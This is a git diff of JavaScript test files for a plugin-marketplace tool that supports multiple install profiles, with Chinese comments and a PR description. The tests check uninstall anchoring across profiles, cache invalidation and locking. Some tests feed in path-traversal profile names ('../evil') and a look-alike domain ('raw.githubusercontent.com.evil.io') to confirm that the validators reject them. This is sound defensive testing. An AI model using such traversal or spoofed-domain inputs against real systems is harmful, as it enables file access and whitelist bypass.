+  check("官方域作前缀的攻击域保持 critical", suffixOnly[0].severity, "critical");
 
   // lifecycle 联合检测（package.json 恶意 JS 模式）
   const lcDir = join(process.env.DSH_HOME, "lifecycle-fixtures");
@@ -1622,6 +1638,33 @@ function mockFetchCapture(payload, status = 200) {
 
   // 9. CLI 指令 npm 等价回退纯函数（issue #54 archify 教训）
   check("isNpmCliTarget scope 包带版本", lib.isNpmCliTarget("@tt-a1i/archify-dsh@0.1.0"), true);
+  // 跨 profile 锚点定位（自审 H5）：resolveRecordNodeModules 按记录 location 定位真实落点
+  {
+    const profilesRoot = join(process.env.DSH_HOME, "profiles");
+    const webNm = join(profilesRoot, "web", "node_modules");
+    const legacyNm = join(profilesRoot, "legacy", "node_modules");
+    mkdirSync(join(legacyNm, "old-plugin"), { recursive: true });
+    lib.setTargetProfile("desktop");
+    try {
+      // location 在其他 profile 内 → 返回那个 profile 的 node_modules
+      check("锚点：legacy profile 记录定位到 legacy NM",
+        lib.resolveRecordNodeModules({ location: join(legacyNm, "old-plugin") }), legacyNm);
+      // 无 location → 回退当前 PROFILE_NM
+      check("锚点：无 location 回退当前 NM",
+        lib.resolveRecordNodesModules === undefined ? lib.resolveRecordNodeModules({}) : lib.resolveRecordNodeModules({}),
+        join(profilesRoot, "desktop", "node_modules"));
+      // location 在当前 profile 内 → 当前 NM
+      check("锚点：当前 profile 记录返回当前 NM",
+        lib.resolveRecordNodeModules({ location: join(join(profilesRoot, "desktop", "node_modules"), "p") }),
+        join(profilesRoot, "desktop", "node_modules"));
+      // 非法 profile 名（穿越形态）不解析——回退当前 NM
+      check("锚点：非法 profile 名回退",
+        lib.resolveRecordNodeModules({ location: join(profilesRoot, "..", "evil", "node_modules", "x") }),
+        join(profilesRoot, "desktop", "node_modules"));
+    } finally {
+      lib.setTargetProfile("web");
+    }
+  }
   check("isNpmCliTarget 裸包名", lib.isNpmCliTarget("dsh-web-ui-all"), true);
   check("isNpmCliTarget owner/name 仓库形态", lib.isNpmCliTarget("tt-a1i/archify"), false);
   check("isNpmCliTarget 空/非法", lib.isNpmCliTarget(""), false);

--- a/scripts/tests/integration/profile.test.mjs
+++ b/scripts/tests/integration/profile.test.mjs
@@ -60,6 +60,27 @@ check("readTargetProfile 合法配置生效", await lib.readTargetProfile(), { p
 writeFileSync(configFile, "{ broken", "utf8");
 check("readTargetProfile 损坏 JSON 回退 web", await lib.readTargetProfile(), { profile: "web", fromConfig: false });
 
+// ---- 切换 profile 后扫描缓存失效（五轮审计）----
+// profileScanCache 按 PROFILE_NM 构建（列表「已安装」标注来源）。切换后必须重扫：
+// 否则 desktop 已装插件在 web 列表仍标「已装」，切回时旧标注反向残留。
+{
+  mkdirSync(join(home, "profiles", "web", "node_modules", "alpha-pkg"), { recursive: true });
+  writeFileSync(join(home, "profiles", "web", "node_modules", "alpha-pkg", "package.json"),
+    JSON.stringify({ name: "alpha-pkg", version: "1.0.0" }), "utf8");
+  mkdirSync(join(home, "profiles", "desktop", "node_modules", "beta-pkg"), { recursive: true });
+  writeFileSync(join(home, "profiles", "desktop", "node_modules", "beta-pkg", "package.json"),
+    JSON.stringify({ name: "beta-pkg", version: "2.0.0" }), "utf8");
+  lib.setTargetProfile("web");
+  let scan = await lib.scanProfilePackages();
+  check("扫描缓存 web 含 alpha-pkg", scan.has("alpha-pkg"), true);
+  check("扫描缓存 web 不含 beta-pkg", scan.has("beta-pkg"), false);
+  lib.setTargetProfile("desktop");
+  scan = await lib.scanProfilePackages();
+  check("切换后扫描缓存重扫（desktop 含 beta-pkg）", scan.has("beta-pkg"), true);
+  check("切换后扫描缓存反向失效（不含 alpha-pkg）", scan.has("alpha-pkg"), false);
+  lib.setTargetProfile("web"); // 恢复（后续路由测试用）
+}
+
 // ---- profile 路由 ----
 let registered = [];
 const fakeCtx = {

--- a/scripts/tests/integration/profile.test.mjs
+++ b/scripts/tests/integration/profile.test.mjs
@@ -41,24 +41,24 @@ check("setTargetProfile 含点回退 web", lib.setTargetProfile("web.profile"), 
 // 恢复 web（后续测试用）
 lib.setTargetProfile("web");
 
-// ---- readTargetProfile：config.json 缺失 → web ----
-check("readTargetProfile 无配置回退 web", await lib.readTargetProfile(), "web");
+// ---- readTargetProfile：config.json 缺失 → web（fromConfig=false，启动回调不覆盖显式设置）----
+check("readTargetProfile 无配置回退 web", await lib.readTargetProfile(), { profile: "web", fromConfig: false });
 
 // ---- readTargetProfile：非法名 → web ----
 writeFileSync(configFile, JSON.stringify({ targetProfile: "../evil" }), "utf8");
-check("readTargetProfile 非法名回退 web", await lib.readTargetProfile(), "web");
+check("readTargetProfile 非法名回退 web", await lib.readTargetProfile(), { profile: "web", fromConfig: false });
 
 // ---- readTargetProfile：目录不存在 → web ----
 writeFileSync(configFile, JSON.stringify({ targetProfile: "ghost" }), "utf8");
-check("readTargetProfile 目录不存在回退 web", await lib.readTargetProfile(), "web");
+check("readTargetProfile 目录不存在回退 web", await lib.readTargetProfile(), { profile: "web", fromConfig: false });
 
-// ---- readTargetProfile：合法 + 目录存在 → 生效 ----
+// ---- readTargetProfile：合法 + 目录存在 → 生效（fromConfig=true）----
 writeFileSync(configFile, JSON.stringify({ targetProfile: "desktop" }), "utf8");
-check("readTargetProfile 合法配置生效", await lib.readTargetProfile(), "desktop");
+check("readTargetProfile 合法配置生效", await lib.readTargetProfile(), { profile: "desktop", fromConfig: true });
 
 // ---- readTargetProfile：损坏 JSON → web ----
 writeFileSync(configFile, "{ broken", "utf8");
-check("readTargetProfile 损坏 JSON 回退 web", await lib.readTargetProfile(), "web");
+check("readTargetProfile 损坏 JSON 回退 web", await lib.readTargetProfile(), { profile: "web", fromConfig: false });
 
 // ---- profile 路由 ----
 let registered = [];

--- a/scripts/tests/unit/installed-index.test.mjs
+++ b/scripts/tests/unit/installed-index.test.mjs
@@ -112,6 +112,10 @@ check("A4 listFingerprint 串含列表长度", /function listFingerprint\(repos\
 // 时旧指纹不感知 → 客户端 fp===lastFp 跳过重渲染 → 列表停留在旧 profile 标注。
 // 契约：installed 标志混入哈希。
 check("A5 listFingerprint 混入 installed 标志", /function listFingerprint\(repos\) \{[\s\S]{0,400}installed === true/.test(lib), true);
+// ---- A6：保存 profile 成功且值变化时递增 tick（客户端重新拉取列表）----
+// PluginTab/SkillsTab 的列表 effect 只依赖 props.tick——保存后不 tick 则已渲染
+// 列表不重新 fetch，六轮的指纹修复根本没机会生效（无新请求）。
+check("A6 saveTargetProfile 成功且 profile 变化时递增 tick", /saveTargetProfile[\s\S]{0,900}data\.profile !== prevProfile\) setTick\(tick \+ 1\);/.test(client), true);
 
 // ---- C1：pkg_name 冲突日志须汇总计数（不拼接全量明细刷屏）----
 // 每次列表请求 console.warn 一长串被隐藏仓库名（几十个），dsh+skills 双列表请求

--- a/scripts/tests/unit/installed-index.test.mjs
+++ b/scripts/tests/unit/installed-index.test.mjs
@@ -94,7 +94,7 @@ check("SkillsTab doRefresh finally 复位", /fetchPage\(1, query, true\)\.finall
 // 单飞构建在飞时 save/remove 把 installedIndex 置 null，构建完成会无条件写回旧快照
 // （构建开始时扫描的目录/记录）→ 新安装/卸载在下次事件前标注 miss（静默陈旧）。
 // 契约：save/remove 递增代际计数；构建完成写入前校验代际，变了则丢弃结果（保持 null）。
-check("A1 save/remove 递增代际计数（≥2 处）", (lib.match(/installedIndexGen\+\+/g) ?? []).length, 2);
+check("A1 save/remove/切 profile 递增代际计数（≥3 处）", (lib.match(/installedIndexGen\+\+/g) ?? []).length, 3);
 check("A1 构建完成写入前校验代际", /installedIndexGen !== buildGen/.test(lib), true);
 
 // ---- A3：无 fp 回退必须含 cached_at（防漏更新）----

--- a/scripts/tests/unit/installed-index.test.mjs
+++ b/scripts/tests/unit/installed-index.test.mjs
@@ -107,6 +107,12 @@ check("A3 无 fp 回退串含 cached_at", /return JSON\.stringify\(\[data\.sourc
 // 相同 → 客户端跳过重渲染 → 列表不更新（静默）。契约：fp 串附带 repos.length。
 check("A4 listFingerprint 串含列表长度", /function listFingerprint\(repos\) \{[\s\S]{0,400}repos\.length/.test(lib), true);
 
+// ---- A5：指纹必须含 installed 标志（切 profile/装/卸后标注变化仍触发重渲染）----
+// 标注随请求时状态计算（annotateInstalled），full_name 序列不变但 installed 位翻转
+// 时旧指纹不感知 → 客户端 fp===lastFp 跳过重渲染 → 列表停留在旧 profile 标注。
+// 契约：installed 标志混入哈希。
+check("A5 listFingerprint 混入 installed 标志", /function listFingerprint\(repos\) \{[\s\S]{0,400}installed === true/.test(lib), true);
+
 // ---- C1：pkg_name 冲突日志须汇总计数（不拼接全量明细刷屏）----
 // 每次列表请求 console.warn 一长串被隐藏仓库名（几十个），dsh+skills 双列表请求
 // 时刷屏（用户实测日志可见）。契约：冲突日志改为计数汇总，明细不拼进 warn 消息。

--- a/scripts/tests/unit/security-guards.test.mjs
+++ b/scripts/tests/unit/security-guards.test.mjs
@@ -87,7 +87,7 @@ check("spawnSync bash 探测带 windowsHide", /spawnSync\("bash", \["--version"\
 // 卸载 bundle 主路径 pnpm remove + 降级手工清理。
 check("isBundlePackage 检测 dsh.bundle.patch 声明", /function isBundlePackage[\s\S]*?dsh\.bundle[\s\S]*?patch/.test(lib), true);
 check("registerBundlePackage 记录 dependencies + bundles 层", /registerBundlePackage[\s\S]*?manifest\.dependencies = deps;[\s\S]*?bundles\.push\(pkgName\)/.test(lib), true);
-check("registerBundlePackage 经 pnpm install 注册（cwd=profile，跳过 workspace）", /registerBundlePackage[\s\S]*?runPnpm\(\["install", "--ignore-workspace"\], \{ cwd: PROFILE_WEB_DIR/.test(lib), true);check("profile manifest 原子写（tmp + rename）", /const tmp = PROFILE_PKG \+ "\.tmp";[\s\S]*?rename\(tmp, PROFILE_PKG\)/.test(lib), true);
+check("registerBundlePackage 经 pnpm install 注册（cwd=profile，跳过 workspace）", /registerBundlePackage[\s\S]*?runPnpm\(\["install", "--ignore-workspace"\], \{ cwd: PROFILE_WEB_DIR/.test(lib), true);check("profile manifest 原子写（tmp + rename，路径参数化支持跨 profile）", /const tmp = pkgPath \+ "\.tmp";[\s\S]*?rename\(tmp, pkgPath\)/.test(lib), true);
 check("installRepo bundle 分支在 appendPatchEntry 前 continue（不写单条 insert）", /if \(isBundlePackage\(pkg\) && repo !== SELF_UPDATE_REPO\)[\s\S]*?registerBundlePackage[\s\S]*?continue;/.test(lib), true);
 check("bundle 注册结果导向：pnpm 非零退出但包可解析 → 告警继续", /let pnpmErr = null;[\s\S]*?if \(pnpmErr\) logLine\(t\(lang, "bundlePnpmWarn"/.test(lib), true);
 check("bundle 注册验证子依赖可解析（realpath + createRequire，对齐 ESM 解析语义）", /realpath\(resolvedPkg\)[\s\S]*?createRequire\(join\(anchor, "noop\.js"\)\)[\s\S]*?bundleDepsResolveFail/.test(lib), true);
@@ -107,7 +107,7 @@ check("scanRequirements 显式跳过 symlink", /if \(ent\.isSymbolicLink\(\)\) c
 check("check-update 包名形态校验（≤2 段 + 段字符集 + 排除 ./..）", /const parts = pkgName\.split\("\/"\);[\s\S]*?parts\.length > 2 \|\| parts\.some\(/.test(lib), true);
 check("list handler cliNpmForm 分支同款校验（2539 漏网点）",
   /const cliParts = cliTarget\.split\("\/"\);[\s\S]*?cliParts\.length > 2 \|\| cliParts\.some\(/.test(lib), true);
-check("env-keys location 受管目录校验（扫描前）", /const managed = \[PROFILE_NM, SKILLS_DIR, PRESETS_DIR, CACHE_DIR\]\.some/.test(lib), true);
+check("env-keys location 受管目录校验（扫描前；锚点按记录定位）", /const managed = \[resolveRecordNodeModules\(record\), SKILLS_DIR, PRESETS_DIR, CACHE_DIR\]\.some/.test(lib), true);
 
 // ---- CLI 安装分支：无字符串拼接命令（注入面）----
 // win32 的 dsh .cmd 垫片经 cmd.exe /c 启动——若用「拼接 cmdLine + /d /s /c」：

--- a/scripts/tests/unit/security-guards.test.mjs
+++ b/scripts/tests/unit/security-guards.test.mjs
@@ -63,6 +63,13 @@ check("logLine 定义处截断（≥2 处，保护响应体 log 数组）", (lib
 // 契约：tmp + rename 原子替换（与 saveInstalled/appendPatchEntry 同模式）。
 check("writeListCache 原子写（tmp + rename）", /const tmp = listCacheFile\(kind\) \+ "\.tmp";[\s\S]*?await rename\(tmp, listCacheFile\(kind\)\);/.test(lib), true);
 
+// ---- profile 切换与安装互斥（四轮审计 #184 补丁面）----
+// 安装/卸载/自更新进行中切换 targetProfile：运行中安装路径读 PROFILE_NM/PATCH_FILE/
+// PROFILE_PKG 常量（registerBundlePackage/appendPatchEntry），切换落点突变 → 记录与
+// 实体错位 / patch 写错 profile。契约：profile POST 在鉴权后、写配置前检查 installRunning。
+check("profile POST 安装进行中拒绝切换（installRunning 互斥）", /path: "\/api\/marketplace\/profile"[\s\S]*?if \(installRunning !== null\) return json\(res, 409, \{ error: t\(lang, "installBusy"\) \}\);/.test(lib), true);
+check("profile POST 互斥检查位于配置写入之前", /path: "\/api\/marketplace\/profile"[\s\S]*?installRunning !== null[\s\S]*?writeFile\(cfgPath, JSON\.stringify\(cfg, null, 2\), "utf8"\)/.test(lib), true);
+
 // ---- 上游 v1.5.0 npm 等价回退（installNpmTargetToTemp）：cmd 包装契约 ----
 // 深集成豁免（真实 npm 二进制）——但存在性必须被测试感知：win32 经 cmd.exe 启动 npm
 //（.cmd 垫片 execFile 直接启动会 EINVAL，issue #46 同族），不直接 execFile npm.cmd。

--- a/scripts/tests/unit/security-guards.test.mjs
+++ b/scripts/tests/unit/security-guards.test.mjs
@@ -70,6 +70,13 @@ check("writeListCache 原子写（tmp + rename）", /const tmp = listCacheFile\(
 check("profile POST 安装进行中拒绝切换（installRunning 互斥）", /path: "\/api\/marketplace\/profile"[\s\S]*?if \(installRunning !== null\) return json\(res, 409, \{ error: t\(lang, "installBusy"\) \}\);/.test(lib), true);
 check("profile POST 互斥检查位于配置写入之前", /path: "\/api\/marketplace\/profile"[\s\S]*?installRunning !== null[\s\S]*?writeFile\(cfgPath, JSON\.stringify\(cfg, null, 2\), "utf8"\)/.test(lib), true);
 
+// ---- CLI 安装记录带 profile 锚点提示（七轮审计）----
+// CLI 记录无包级 location（官方 CLI 自管落点），跨 profile 后卸载/检测更新无锚点
+// 可依 → 回退当前 PROFILE_NM 落错 profile（孤儿态）。契约：保存时带安装时刻
+// targetProfile；resolveRecordNodeModules 支持提示分支。
+check("CLI 安装记录保存安装时刻 profile 提示", /saveInstalled\(repo, \{ type: "cli"[\s\S]{0,200}profile: targetProfile \}\)/.test(lib), true);
+check("resolveRecordNodeModules 支持 CLI profile 提示分支", /function resolveRecordNodeModules\(record\) \{[\s\S]*?record\.profile === "string"/.test(lib), true);
+
 // ---- 上游 v1.5.0 npm 等价回退（installNpmTargetToTemp）：cmd 包装契约 ----
 // 深集成豁免（真实 npm 二进制）——但存在性必须被测试感知：win32 经 cmd.exe 启动 npm
 //（.cmd 垫片 execFile 直接启动会 EINVAL，issue #46 同族），不直接 execFile npm.cmd。


### PR DESCRIPTION
## Summary

#193 合并后的后续修复：目标 profile 功能引入「安装记录可能指向非当前 profile」的新状态，代码库多处共享的旧隐含假设（插件永远装在当前 profile）随之失效。本 PR 修复这些失效点。

### 安全
- **白名单后缀攻击**：hazardUrlAllowed 无边界锚定——`raw.githubusercontent.com.evil.io` 被子串匹配误判官方域，downloadExec 命中被错误降级 medium。域名边界 lookahead `(?=[/"'\s]|$)` 修复

### 跨 profile 正确性
- **卸载锚点**：卸载/检测更新/env 编辑/版本读取统一按 record.location 定位真实落点（resolveRecordNodeModules），不再按当前 PROFILE_NM 拼路径——此前切换目标后操作旧安装会静默残留目录与 patch 条目（孤儿态）
- **CLI 记录锚点**：CLI 安装记录保存安装时刻的 targetProfile 作提示（CLI 记录无包级 location）
- **patch 清理**：removePatchEntry 参数化 patchPath，跨 profile 卸载清理安装时 profile 的 cordis.patch.yml，而非当前 profile 的文件
- **targets 推断**：无 names 字段的旧记录跨 profile 卸载时推断分支同样按记录锚点定位

### 状态一致性
- **并发互斥**：profile 切换在 install/uninstall/self-update 进行中拒绝（409）——运行中安装读取 PROFILE_NM/PATCH_FILE 常量，切换会使落点突变
- **标注缓存**：切换 profile 时失效 profileScanCache 与 installedIndex 并递增代际（防构建中旧快照回写）——否则列表「已安装」标注 stale 且反向残留
- **列表指纹**：listFingerprint 纳入 installed 标志——标注翻转触发客户端重渲染
- **客户端刷新**：保存 profile 成功且值变化时递增 tick 触发列表重拉

### 启动时序
- readTargetProfile 返回 `{profile, fromConfig}`：仅配置真实存在且合法时才覆盖，显式设置不被无配置默认值冲掉

### 其他
- CLI 指令跟随 targetProfile；自更新固定 web（本体宿主与插件安装目标是两个概念）
- CVE 弹窗超 10 条追加 "+N more" 提示

## Test plan

- [x] 测试金字塔 35/35；覆盖率 327/327 函数 (100%)；突变测试 24 个存活 0
- [x] 真实环境 e2e：跨 profile 卸载全链路（cordis-plugin/bundle/CLI 记录三形态）、npm bulk advisories API、真实 git clone secrets 弹窗脱敏
- [x] 新增回归断言：白名单边界 5、锚点定位 7、K22 卸载 3、扫描缓存失效 4、profile 互斥契约 2、指纹/tick 契约 2
